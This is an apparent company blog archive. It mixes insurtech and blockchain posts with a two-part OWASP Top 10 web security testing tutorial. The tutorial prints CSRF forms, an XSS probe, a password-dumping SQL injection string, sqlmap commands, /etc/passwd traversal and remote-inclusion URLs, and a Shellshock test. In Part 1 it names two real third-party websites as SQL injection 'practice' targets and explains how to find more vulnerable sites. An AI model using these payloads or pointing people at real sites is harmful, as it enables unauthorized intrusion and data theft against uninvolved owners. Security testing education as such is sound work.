Posts by mantra-admin

Insurance sector is getting renovated with these technologies

InsurTech1-ndas9l39jg47gvzws1cwthi2l5hx2b2q1axah3kvx0

After the entry of technologies in finance sector – FinTech. Insurance sector is ready to make a buzz about it. The term – InsurTech, a combination of words insurance and technology, as a segment is sure to gain the attention of innovators in the coming years.

Artificial Intelligence, Machine Learning and Blockchain technologies will be the hottest technologies to watch in insurance sector. All these technology interventions are helping the insurance sector to offer customer-oriented solutions managing price, risk, cost and customization.

According to the report Insurtech to take home 86 million policies by 2022. (https://www.enterpriseinnovation.net/article/insurtech-take-home-86-million-policies-2022-1956640660.

Insurance sectors are increasingly investing in latest technologies in order to improve their customer experience. The investment in AI applications has increased from $4.0 billion(2015) to $5.0 billion(2016).

Let’s take a look on benefits and use case of these technologies.

Artificial Intelligence/Machine Learning:

AI/ML can help tremendously in insurance sector with payment of premiums and claims, insurance has much to do in terms of customer engagement.

Use cases of AI/ML

  1. Claim management : Claims management can be augmented using machine learning techniques in different stages of the claim handling process. By leveraging AI and handling massive amounts of data in a short time, insurers can reduce the overall processing time.
  2. Marketing and Customer experience: Improving the customer experience by using customer data, usage and demographics.
  3. Telematics: Telematics that helps in gathering the history of speed, turning and braking patterns, distance, time of day and many such things could assist in judging drivers are driving capability and issue an insurance policy accordingly.

Blockchain:

Blockchain/Bitcoin has the great potential to bring the revolution in finance and insurance industry. Blockchain is going to change the way that data is processed and the way investments are handled.

The potential use cases of blockchain, i.e. Distributed Ledger Technology (‘DLT’), anonymised processing, immutable, encryption.

1 . Decentralized cloud storage across the network.

2. HR Management – Resume Authentication for job hunters. Background verification without using third party consultancies.

3. Supply Chain Management & Transparency – Banks and insurers can create performance management programs to increase engagement

4. Vehicle Leasing system – Complex vehicle supply chain management can be done using Blockchain and smart contracts

Takeaway:

Let’s take this opportunity to explore new dimensions of the business and let robotics take the command. Its time to say good – bye to the age- old processes and welcome to the whole new world of technologies in insurance.

Blockchain , Distributed ledger technology , bitcoin concept. Electric circuit graphic and infographic of Block chain , network connect , security , binary coded icons.

Business Applications of Blockchain

What is Blockchain:

A distributed ledger – It tracks ownerships through historical assets and identities – and everyone has a copy.
Unique Tokens – long numbers are tracked through the ledger
Anonymized Processing / Mining – transactions are processed through miners.
Immutable, encrypted, pseudo anon – and they are immutable once they’ve happened, and are encrypted.
Consensus Mechanisms – as long as 51% of the network agree, it holds.

Is The Blockchain a New Web 3.0?

The blockchain gives internet users the ability to create value. It may revolutionize the future and a couple of places it is making a difference today.

12 potential business applications are listed down for blockchain.

Smart ContractsDistributed ledgers enable the coding of simple contracts that will execute once the specific conditions are met.
The Sharing Economy – By enabling peer-to-peer payments, blockchain opens the door to direct interaction between parties – a truly sharing economy results.

CrowdFundingBlockchain takes this interest to the next level, potentially creating crowd-sourced venture capital funds.

GovernanceBy making the results fully transparent and publicly accessible, distributed database technology could bring full transparency to elections or any other kind of poll taking. Ethereum-based smart contracts help to automate the process.

Supply chain auditing – Distributed ledgers provide an easy way to certify that the backstories of the things we buy are genuine. Transparency comes with blockchain-based timestamping of a date location.

File Storage – Decentralized file storage on the internet brings clear benefits. Distributing data throughout the network protects files from getting hacked or lost.

Protection of Intellectual Property – Smart contracts can protect copyright and automate the sale of creative works online, eliminate the risk of copying and redistribution.

Internet of Things (IoT) Smart contracts make the automation of remote systems management possible. A combination of software, sensors, and the network facilitate an exchange of data between objects and mechanisms.

Identity Management – Distributed ledgers offer enhanced methods for proving who you are. Having secured identity will also be important for online interactions – for instance, in the sharing economy.

Data Management – In the future, users will have the ability to manage and sell the data their online activity generates. Because it can be easily distributed in small fractional amounts, Bitcoin – or something like that.

Land title registration – AsPublicly-accessible ledgers, blockchain can make all kinds of record-keeping more efficient. Property titles are a case in point. They tend to be susceptible to fraud, as well as costly and labor-intensive to administer.

Stock Trading When executed peer-to-peer, trade confirmations become almost instantaneous. This means intermediaries – such as the auditors, and custodians – get removed from the process.

What Problems does Blockchain solve?
Removal of the Middlemen to make system decentralized. There is no, a single entity that controls the network, Instead, it’s analogically similar to BitTorrent. Own your own data in the new Data Economy.

levels-of-distribution

The Central Point of Failure – Reliability on the Central Server containing all the data is less in case of Hacker’s attack on the server, Blockchain Technology makes us move towards a permanent web. A web where links never die. Stupid 404 !!!

Establishing Transparency, to make system Trustless. In other words, no need to put the trust on the peers, as the designed system is highly tamper-resistance.

Faster Data Transfer – A peer-to-peer network helps the transfer of data super fast as compared to the central server serving data.

In general, Blockchain is creating a world with more and more value. It can be applied to any need for a trustworthy system of record.

Blockchain-Image-3

What is Blockchain Technology?

“Bitcoin is just one example of something that uses a blockchain. Cryptocurrencies are just one example of decentralized technologies. And now that the Internet is big enough and diverse enough, I think we will see different flavors of decentralized technologies and blockchains. I think decentralized networks will be the next huge wave in technology. The blockchain allows our smart devices to speak to each other better and faster.” Melanie Swan, author of Blockchain: Blueprint for a New Economy by Swan, Melanie (2015) Paperback

Blockchain is now making the biggest revolution in the finance industry. As a technologist, we should evaluate and apply the concept of Blockchain without thinking Cryptocurrency. It can unveil many possibilities and can lead to innovations. Cryptocurrency is becoming a distraction to the possibilities of blockchain as people have started using terminologies vice-versa.

What is blockchain technology and why it is safe?

Blockchain provides a protocol for building a shared, replicated and distributed online ledger network. Each participant in this blockchain network maintains their own copy of that database, or collection of organized information.

If you simply put,  blockchain is made up of a series of blocks of data that are securely tied together. Since all records are connected to each other, they are entrenched. It is impossible to modify or alter a previous record without changing the copy of every participant in the blockchain.

There is some disruption too

Contracts, transactions, and ledger are the defining structures which set the boundaries of our economic, legal and political systems. Today these involve people and corruption. With blockchain, contracts can be embedded in digital codes, stored in shared databases, protected from tampering.

Blockchain may be disruptive, but the question is if it’s too disruptive for its own good.

Although blockchain is one of the hottest and intriguing technologies currently in the market but it comes with its own challenges. Many business leaders and industrialists are skeptical about blockchain.

Let’s see what are those skeptics:

  • It will be hard for established business in the industry where blockchain will push uncomfortable transparency which can lead to price corrections and change in business models. It can be so much disruption that it can lead to the foundation of new technologies.
  • Adoption problem of Blockchain technology
  • Time-consuming: Blockchain-based transactions can only complete when all parties update their respective ledgers – which is a very time-consuming process.

Eight reasons to be skeptical about blockchain.

eb33b40e2bf41c3e815d4401ee514792ea7fe4dc1eb21845_1920

Web Application Security Testing – Part 2

We have discussed security testing web application in our last week article. Here is the list of remaining web applications security testing tools.

6. SENSITIVE DATA EXPOSURE

Already explained in Broken Authentication and session management

Examples of vulnerable application

  • Data stored in plain text, such as passwords or credit card data (see the first well-known event)
  • Lack of HTTPS on authenticated pages
  • Hashed passwords with lack of salt, making the password easily cracked
  • Tokens disclosed in public source code
  • Browser header caching sensitive data

7. CROSS SITE FORGERY

Cross-Site Request Forgery (CSRF)-also known as XSRF or session riding- attacks, an attacker forces a victim to make an unexpected web request such as a fraudulent bank transaction. For example, an attacker tricks the victim client into calling a banking function in a vulnerable page that transfers money from the victim’s to the attacker’s account. The victim triggers the attack by following an attacker’s link or visiting an attacker’s page. The vulnerable server page doesn’t recheck the authenticity of the victim’s request and allows the transfer to proceed.

The following steps detail the anatomy of a CSRF attack:

  1. Attacker finds functionality in a web application that is vulnerable to CSRF.
  2. Attacker builds a link invoking the vulnerable function and passing the required parameters as to executed the chosen attack.
  3. Attacker waits until the victim client authenticates with the vulnerable web application.
  4. Attacker tricks victim client into following the malicious link.
  5. Victim client sends forged request to vulnerable server.
  6. Vulnerable server allows and executes the forged request.

For example, the link might looks like this when they payload is to transfer money from the victim’s to the attacker’s account:

/makeTransfer?amount=1000&dest=attacker@attackersite.com

The link below sends an email titled Hello to johny@example.com :

/sendMail?to=johny@example.com&title=Hello&body=I+did+not+send+this

Basic Test for Cross-site Request Forgery

Follow these test steps to test against CSRF bugs.

->Find a web application page that performs an action based on a user request.

->Construct a page containing a link or redirect that sends a forged request to the application server. This link usually contains a tag such as an img or iframe (although mostly any tags can be used) with the source address pointing to the request:

<a href=”http://bank.com/transfer.do?acct=MARIA&amount=100000″>View my Pictures!</a>

<img src=”http://bank.com/transfer.do?acct=MARIA&amount=100000″ width=”1″ height=”1″ border=”0″>

->Note that the links above will both generate a GET request. In order to test for POST requests you must create a page containing a form with the URL parameters passed as hidden input, and add a script to automatically submit the form:

<form action=”http://bank.com/transfer.do” method=”post”>

     <input type=”hidden” name=”acct” value=”MARIA”>

     <input type=”hidden” name=”ammount” value=”100000″>

</form>

<script>

     document.forms[0].submit();

</script>

->Open an Internet browser and log in to the web application as a legitimate user.

->Open the page built in step 2 (follow the link if necessary).

->Confirm if the request was successful.

->Repeat test case for every application create/update/delete/mail action.

Expected result: the test fails if the application trusts and processes the forged request.

–Also the cookies can be manipulated.

Another example,

Suppose, we allow users to post images on our forum. What if one of our users posted this image?

<img src=”http://foo.com/logout>

Not really an image, true, but it will force the target URL to be retrieved by any random user who happens to browse that page — using their browser credentials! From the webserver’s perspective, there is no difference whatsoever between a real user initiated browser request and the above image URL retrieval.

If our logout page was a simple HTTP GET that required no confirmation, every user who visited that page would immediately be logged out.

Examples of cross site forgery,

https://hackerone.com/reports/196458

https://hackerone.com/reports/192131

https://hackerone.com/reports/157993

https://hackerone.com/reports/155774

8. MISSING FUNCTION LEVEL ACCESS CONTROL

If the authentication check in sensitive request handlers is insufficient or non-existent the vulnerability can be categorised as Missing Function Level Access Control.

To test for missing function level access control:

The best way to find out if an application has failed to properly restrict function level access is to verify every application function:

  1. Does the UI show navigation to unauthorized functions?
  2. Are server side authentication or authorization checks missing?
  3. Are server side checks done that solely rely on information provided by the attacker?

Using a proxy, browse the application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses are alike, the My Organisation application is probably vulnerable.

In one potential scenario an attacker simply force browses to target URLs. Consider the following (non-My Organisation) URLs which are both supposed to require authentication. Admin rights are also required for access to the “admin_getappInfo” page.

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

If the attacker is not authenticated, and access to either page is granted, then unauthorized access was allowed. If an authenticated, non-admin, user is allowed to access the “admin_getappInfo” page, this is a flaw, and may lead the attacker to more improperly protected admin pages.

Example:

https://hackerone.com/reports/27404

9. SHELLSHOCK & HEARTBLEED

Shellshock:

Shellshock is a remote command execution vulnerability in Bash. A series of random characters, () { :; }; , confuses Bash because it doesn’t know what to do with them, so by default, it executes the code after it.

Good read: http://garage4hackers.com/showthread.php?t=6902

Tools used to check Shellshock:

Through command line:

  To determine if your Linux or Unix system is vulnerable, from a command line, type:

        env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”

 If the system is vulnerable, the output will be:

 vulnerable

 this is a test

 An unaffected (or patched) system will output:

 bash: warning: x: ignoring function definition attempt

 bash: error importing function definition for `x’

           this is a test

Online tools:

https://pentest-tools.com/network-vulnerability-scanning/bash-shellshock-scanner

http://shellshock.brandonpotter.com/

http://shellshock.iecra.org/

Heartbleed:

It is a critical bug in the OpenSSL’s implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server’s memory, potentially revealing users data, that the server did not intend to reveal.

An attacker can trick OpenSSL into allocating a 64KB buffer, copy more bytes than is necessary into the buffer, send that buffer back, and thus leak the contents of the victim’s memory, 64KB at a time.

Tools used for Heartbleed:

defribulator v1.16

Command→ python ssltest.py example.com (ssltest.py file is available with me)

Online test tool : https://filippo.io/Heartbleed/

Good read : https://blog.bugcrowd.com/heartbleed-exploit-yet/ , http://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html

For android you can download Bluebox open SSL scanner

Prevention

  • Upgrade the OpenSSL version to 1.0.1g
  • Request revocation of the current SSL certificate
  • Regenerate your private key
  • Request and replace the SSL certificate

Examples of Heartbleed:

https://hackerone.com/reports/49139

https://hackerone.com/reports/44294

https://hackerone.com/reports/6566

https://hackerone.com/reports/6475

10.UNVALIDATED REDIRECTS AND FORWARDS

Unvalidated redirect vulnerabilities occur when an attacker is able to redirect a user to an untrusted site when the user visits a link located on a trusted website. This vulnerability is also often called Open Redirect.

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

How to test?

Spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.

Preventing Unvalidated Redirects and Forwards

  • Simply avoid using redirects and forwards.
  • If used, do not allow the url as user input for the destination. This can usually be done. In this case, you should have a method to validate URL.
  • If user input can’t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
  • It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL.
  • Sanitize input by creating a list of trusted URL’s (lists of hosts or a regex).
  • Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.

Example:

https://hackerone.com/reports/175168

https://hackerone.com/reports/169759

This article is written by our QA Rijin Raj.

eb33b40e2bf41c3e815d4401ee514792ea7fe4dc1eb21845_1920

Web Application Security Testing – Part 1

eb33b40e2bf41c3e815d4401ee514792ea7fe4dc1eb21845_1920

The Open Web Application Security Project (OWASP) is an international organization dedicated to enhancing the security of web applications.

The conference held at Mantra Labs by one of our experienced test engineer Rijin. Here he has  discussed the current top 10 web application security risks worldwide. The list describes each vulnerability, provides examples, and offers suggestions on how to avoid it.

The top 10 web application security risks worldwide are:

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Indirect object security reference
  5. Security misconfiguration
  6. Sensitive data exposure
  7. Missing function level access control
  8. Cross site forgery
  9. Using components with known vulnerabilities: Heartbleed and Shellshock
  10. Unvalidated redirects and forwards

Link to Hackerone Bug reports:

https://h1.sintheticlabs.com/

From here you can take the understanding and would get an idea of ongoing security issues/bugs. How the hackers are exploiting the web applications. Various security/penetration bugs are listed here.

https://www.exploit-db.com/exploits/42309/

 

  1. INJECTION

This is when an attacker sends rogue content to a web application interpreter causing the interpreter to execute authorized commands. The most common of the code injection attacks are SQL Injections, also known as SQLi. An SQLi attack is done when malformed code is sent to the database server, thus leading to the exposure of your data. And this attack style is so simple and easy, anyone with access to the internet can do it – SQLi scripts are available for download and can be acquired easily.

How is it done?

The character “‘” is entered into the search field and pressing the button leads to an error page which displays more information than needed.

This example showcases a badly and insecurely programmed application that is incapable of handling SQL Injections. Just a few illegal characters with a little sniffing around leads the hacker to this string: “‘ union select password from users;”. He can then implement this finding to harvest usernames and passwords from the database. This is just one basic way to exploit application databases.

Tool commonly used for SQL Injection

SQLmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

It is commonly used in Kali-linux.

After finding a vulnerable page you can find database by typing :

sqlmap –u (url) –dbs

Guide to exploit via sqlmap

https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/

https://www.hackers-arise.com/single-post/2017/01/20/Database-Hacking-Part-3-Using-sqlmap-for-SQL-Injection-Against-MySQL-and-WordPress

For practice you can use the following websites:

http://www.shumka.com/shumka-at-50/news/index.php?id=847

http://waytogonatural.com/product_detail.php?ID=4526

You can also find SQL vulnerable website on your own. You just have to look for

  • php?id=(any Number)
  • login.php?id=(any number)
  • index.php?id=(any number)

Examples of SQL injection:

https://hackerone.com/reports/200818

https://hackerone.com/reports/179751

2.BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Incorrect implementation of authentication schemes and session management can allow unauthorized users to assume the identities of valid users.

Broken Authentication and Session Management attacks are anonymous attacks with the intention to try and retrieve passwords, user account information, IDs and other details.

Key Points to check if you are vulnerable:

  1. User authentication credentials aren’t protected when stored using hashing or encryption.
  2. Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
  3. Session IDs are exposed in the URL (e.g., URL rewriting).
  4. Session IDs are vulnerable to session fixation attacks.
  5. Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
  6. Session IDs aren’t rotated after successful login.
  7. Passwords, session IDs, and other credentials are sent over unencrypted connections.

Examples of attack scenarios:

Scenario #1:

Airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2:

Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3:

Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every user’s’ password to the attacker.

Vulnerability to ‘Sensitive Data exposure’:

 

  1. Is any of this data stored in clear text long term, including backups of this data?
  2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
  3. Are any old / weak cryptographic algorithms used?
  4. Are weak crypto keys generated, or is proper key management or rotation missing?
  5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? (Nikto)

Prevention from Sensitive data exposure:

  1. Make sure you encrypt all sensitive data .
  2. Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
  3. Ensure strong standard algorithms and strong keys are used, and proper key management is in place.
  4. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.
  5. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.

Protection against broken authentication and session management:

Password Strength

-Minimum size and complexity.

-Complexity depends on the usage of combinations of alphabetic, numeric, and/or non-                              alphanumeric characters

-Change password periodically

-Prevent from reusing previous passwords.

Password Use 

-Restrict to a defined number of login attempts per unit of time and repeated failed login                           attempts should be logged.

-System should not indicate whether it was the username or password that was wrong if a                           login  attempt fails.

Password Change Controls 

-Users should always be required to provide both their old and new password when changing                   their password .

-If forgotten passwords are emailed to users, the system should require the user to                                      reauthenticate whenever the user is changing their e-mail address, otherwise an attacker who                  temporarily has access to their session (e.g., by walking up to their computer while they are                       logged in) can simply change their e-mail address and request a ‘forgotten’ password be                           mailed to them.

Password Storage 

-Passwords must be stored in either hashed or encrypted form

-Encryption should be used when the plain text password is needed

Session ID Protection

-A user’s entire session should be protected via SSL.

-Session ID should never be included in the URL as they can be cached by the browser.

-Session IDs should be long, complicated, random numbers that cannot be easily guessed.

-Session IDs can also be changed frequently during a session to reduce how long a session ID                   is valid. Session IDs must be changed when switching to SSL, authenticating, or other major                   transitions.

Browser Caching 

-Authentication and session data should never be submitted as part of a GET, POST should                      always be used instead.

-Authentication pages should be marked with all varieties of the no cache tag to prevent                            someone from using the back button in a user’s browser to backup to the login page and                            resubmit the previously typed in credentials.

Examples of broken authentication and session management:

3.CROSS SITE SCRIPTING

This is when a browser unknowingly executes scripts to hijack sessions or redirect to a rogue site.

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.

There are basically two types of XSS:

a)Stored XSS

b)Reflected XSS

Stored XSS

  • A Stored Cross Site Scripting vulnerability occurs when the malicious user can store some attack which will be called at a later time upon some other unknowing user. The attack is actually stored in some method to be later executed.
  • The storage of a method could involve a database, or a wiki, or blog. Basically the malicious user has stored some type of attack, that when an unknowing user will encounter this, the attack will be executed. The stored method actually not only has the problem of incorrect checking for input validation, but also for output validation. Even if data has been sanitized upon input, it should also be checked for in the output process. By checking and validated the output, you could also uncover unknown issues during the input validation process.

Reflected XSS

  • The malicious user has discovered that a field within a website or web application holds a XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious to some unknown user. Reflected XSS vulnerabilities occur when a unknowing user is directed to a web application that has a XSS vulnerability, by the malicious user. Once the unknowing user gets to the web site or application the malicious user’s attack is executed.
  • The attack is crafted by a series of url parameters that are sent via a url. The malicious user then sends his/her malicious url with the url parameters to unknowing users. This is typically sent by email, instant messages, blogs or forums, or any other possible methods.

How to test for XSS injection vulnerabilities, example:

You can determine if a web-based application is vulnerable to XSS attacks very easily. A simple easy test is to take a current parameter that is sent in the HTTP GET request and modify it. Take for example the following request in the browser address URL bar. This url will take a name parameter that you enter in a textbox and print something on the page. Like “Hello George, thank you for coming to my site” http://www.yoursite.com/index.html?name=george And modify it so that add an extra some additional information to the parameter. For example try entering something similar to the following request in the browser address URL bar.

http://www.yoursite.com/index.html?name=<script>alert(‘You just found a XSS vulnerability’)</script>

If this pops up an alert message box stating “You just found a XSS vulnerability”, then you know this parameter is vulnerable to XSS attacks. The parameter name is not being validating, it is allowing anything to be processed as a name, including a malicious script that is injected into the parameter passed in. Basically what is occurring is normally where the name George would be entered on the page the </script></script> message is instead being written to the dynamic page.

The alert message just is an example of how to test for the XSS vulnerability.

Some examples of cross-site scripting attack vectors:

http://hackersonlineclub.com/cross-site-scripting-xss/

Tools that can be used:

Zaproxy: It’s a freeware.

https://github.com/zaproxy/zaproxy/wiki/Downloads

Also Burp Suite and Beef can be used to find out XSS vulnerability.

4.INDIRECT OBJECT SECURITY REFERENCE

An attacker can access a reference to a file or directory and manipulate that reference to gain unauthorized access to other objects.

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.

  • Vulnerability to Insecure Direct Object References
  1. For direct references to restricted resources, does the application fail to verify the user is authorized to access the exact resource they have requested?
  2. If the reference is an indirect reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?
  • To test Insecure Direct Object References

To test for this vulnerability the tester first needs to map out all locations in the application where user input is used to reference objects directly. For example, locations where user input is used to access a database row, a file, application pages and more. Next the tester should modify the value of the parameter used to reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.

The best way to test for direct object references would be by having at least two (often more) users to cover different owned objects and functions. For example two users each having access to different objects (such as purchase information, private messages, etc.), and (if relevant) users with different privileges (for example administrator users) to see whether there are direct references to application functionality. By having multiple users the tester saves valuable testing time in guessing different object names as he can attempt to access objects that belong to the other user.

Some basic examples:

The value of a parameter is used directly to retrieve a database record

Sample request:

http://foo.bar/somepage?invoice=12345

  • In this case, the value of the invoice parameter is used as an index in an invoices table in the database. The application takes the value of this parameter and uses it in a query to the database. The application then returns the invoice information to the user.
  • Since the value of invoice goes directly into the query, by modifying the value of the parameter it is possible to retrieve any invoice object, regardless of the user to whom the invoice belongs. To test for this case the tester should obtain the identifier of an invoice belonging to a different test user (ensuring he is not supposed to view this information per application business logic), and then check whether it is possible to access objects without authorization.

Examples of the attack:

https://hackerone.com/reports/12011

https://hackerone.com/reports/42587

Testing traversal/file include

Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not intended to be accessible.

Testing techniques to test this flaw

In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. Here are some examples of the checks to be performed at this stage:

Are there request parameters which could be used for file-related operations?

Are there unusual file extensions?

Are there interesting variable names?

http://example.com/getUserProfile.jsp?item=ikki.html

http://example.com/index.php?file=content

http://example.com/main.cgi?home=index.htm

An attacker could insert the malicious string “../../../../etc/passwd” to include the password hash file of a Linux/UNIX system. This kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

It also possible to include files and scripts located on external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way.

http://example.com/index.php?file=file:///etc/passwd

If protocols are accepted as arguments, as in the above examples, it’s also possible to probe the local services and nearby services.

http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080

Example of path traversal: https://hackerone.com/reports/150018

5.SECURITY MISCONFIGURATION

Improper server or web application configuration leading to various flaws.

  • Debugging enabled
  • Incorrect folder permissions
  • Using default accounts or passwords

Vulnerability to Security Misconfiguration

Is your application missing the proper security hardening across any part of the application stack? Including:

  1. Is any of your software out of date? This software includes the OS, Web/App Server, DBMS, applications, APIs, and all components and libraries.
  2. Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?
  3. Are default accounts and their passwords still enabled and unchanged?
  4. Does your error handling reveal stack traces or other overly informative error messages to users?
  5. Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?

Attack scenarios:

Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.

Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.

Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.

Protection against Security misconfigurations:

  • Install latest updates and security patches. Have an easy to manage updating process with test environments to check updates before deploying to production environments.
  • Remove sample applications that ship with content delivery systems and web frameworks. Most tools that help build web applications include demo and sample code to help teach developers how to use the tools and get you started. These samples and demos should be removed. They provide a known target for anyone attempting to compromise web application security.
  • Remove unused features, plugins and web pages. Only include the parts of web applications that you need to provide your service to end users. Remove any plugins or functionality that you are not using.
  • Turn off access to setup and configuration pages. Don’t leave the setup and configuration pages available for users to use.
  • Change usernames, passwords and ports for default accounts. Web application frameworks and libraries often ship with default administration names, passwords and access ports enabled. Everyone knows these. Change all these to non standard usernames, passwords and ports.
  • Don’t share passwords between accounts on Dev, Test and Production systems. Related to the point above. Don’t use the same administration accounts and settings across your Dev, Test and Production systems.
  • Turn off debugging so that internal info isn’t sent back in response to test queries or errors. Excessive debugging information can be used to glean information about a web applications configuration.

Good read :

https://lockmedown.com/owasp-5-security-misconfiguration-hardening-your-asp-net-app/

Stay tuned for rest of the security risks, they are coming shortly.

technology-illustration-shutterstock-crop-600x338--crop-600x338

InsurTech: Present and Future of Insurance Technology

Insurers need to spin the technology that offers their customers with more efficient, optimized and relevant policies. The ones that could be customized could be fed with data from a wearable/mobile device or the ones that are applicable for just an hour. With such customer focus initiatives, they yet need to achieve core business objectives like price and operational efficiency and compliance to stringent regulations. Could the Insurtech meet up the expectations? Could technology lend a helping hand? Let’s explore how the insurance vertical is evolving with the latest technology and what its future is –

The Present of InsurTech

The insurance firms are under immense pressure of reorganizing their house – customized policies, risk mitigation strategies, real-time analytics, instant claim settlement, sensors, drones and augmented reality (AR) apps are playing a significant role. So, what are the technologies adopted by the firms? Let’s take a closer look –

Robo-Advisory Services

Robo-Advisors have seen a broad adoption across insurance sectors. Unlike olden days when hiring a financial advisor was a dream for many individuals, with Robo-advisors people of the low-income group could use DIY advisory for their financial portfolio. Should you opt for all critical disease cover or only a few? Should buying an integrated policy be beneficial or an individual one is some of the questions that could be answered via Robo-Advisory Services.

Policies via Sensors, Detectors, and Telematics

Sensors, Detectors connected via the internet could send early signals of smoke/radiations to the rescue services, helping in minimizing the damages. Also, Telematics like monitoring automobile speed, the behavior of a rash driver could assist in making a clear judgment of claim policies for individuals and insurance firm. Hence while IoTs and interconnected network could be a boom in offering customized policies, these minuscule are taking insurance services to the next step.

The Future of InsurTech

Could technologies like Blockchain, Augmented Reality, Virtual Reality change the world sees insurance sector? Would they bring in the exotic flavors of policies? Only time can tell, for now, let’s explore how these technologies could be handy in insurance sector?

Blockchain

A distributed ledger technology has the potential to ease out fraud detection and risk prevention as per a report from EY. The report also highlights that blockchain is efficient in establishing transparent and customer focussed claims building trust and loyalty for the insurance firms.

Augmented or Virtual Reality

Just imagine driving in stormy weather, an AR app helps you define the road/lane border so that you do not bombard a tree or a car in your parallel path. Or how about a 3D modeling and simulations help customers in making insurance claims easier and faster? Or how about before you go for the home insurance a simulation helps you pinpoint all the areas under insurance rather than reading the lengthy document? It all is a possibility with AR and VR technologies.

With the evolution of technologies, the secret is to be adaptable to change. @Mantra Labs we believe in this, and hence one of our esteemed clients Religare is using our InsurTech solutions in Post-sale, pre-claim, post-claim and renewal processes. It helps in providing customers with transparent and intuitive services that is robust and secured for businesses. A win-win for all.

Reference Links:

https://assets.kpmg.com/content/dam/kpmg/xx/pdf/2016/10/how-augmented-and-virtual-reality-changing-insurance-landscape.pdf

https://www.realexpayments.com/blog/augmented-reality-insurance-businesses/

IOT in Insurance Sector: Home, Auto and Health Insurance

Internet Of Things is helping the Insurance Industry as well. Based on the reports we have read it is all set to transform the insurance industry in flexible and exciting ways. Last month Accenture insurance blog stated that 39% have already launched or are piloting connected home or connected building initiatives that use the Internet of Things, and 44% consider connected devices to be a driver of future insurance revenue growth.

Future insurance is set to be completely transformed because of IoT. There are already some insurance companies that have adopted IoT and Insurance Tech such as Bajaj Allianz, ICICI Lombard, HDFC life.

 

connected-cars

Image Source: iamwire

In this article we plan to discuss how IoT is helping in home insurance,  auto insurance, and health insurance businesses.

Health Insurance:

Wearable devices such as fitness bands such as FitBit are helping people, especially elderly, to track their health details constantly. This information can further help doctors treating the patients requiring immediate medical attention. Insurance companies, at the same time, can reduce their claims by offering incentives to their policyholders to use these kinds of devices.

Home Insurance:

Sensors, Detectors connected via the internet could send early signals of smoke/radiations to the rescue services, helping in minimizing the damages. Information derived from inter-connected smart devices at home can also be utilized by insurance companies to determine the safety maintained at home. In the first place, smart devices used to keep an eye on their home while they are away. This would decrease the unfortunate incidences of theft or burglary and save people from losing their precious assets as well. Eventually, it would also bring down the claims raised by households.
